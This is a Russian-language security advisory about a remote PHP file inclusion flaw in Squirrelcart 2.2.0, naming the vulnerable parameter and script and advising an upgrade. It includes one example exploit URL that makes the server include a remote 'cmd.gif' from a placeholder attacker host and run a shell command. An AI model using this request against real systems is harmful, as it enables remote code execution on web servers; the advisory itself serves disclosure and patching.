PHP-инклюдинг в Squirrelcart

Дата публикации:
19.05.2006
Дата изменения:
24.03.2009
Всего просмотров:
3543
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Squirrelcart PHP Shopping Cart 2.x
Уязвимые версии: Squirrelcart 2.2.0, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "cart_isp_root" в сценарии cart_content.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Пример:

/cart_content.php?cart_isp_root=http://yourhost/cmd.gif?cmd=ls

URL производителя: www.squirrelcart.com

Решение: Установите последнюю версию с сайта производителя.

Журнал изменений:
24.03.2009
Изменена секция "Решение"

Ссылки: Squirrelcart <= 2.2.0 Remote File Inclusion

или введите имя

CAPTCHA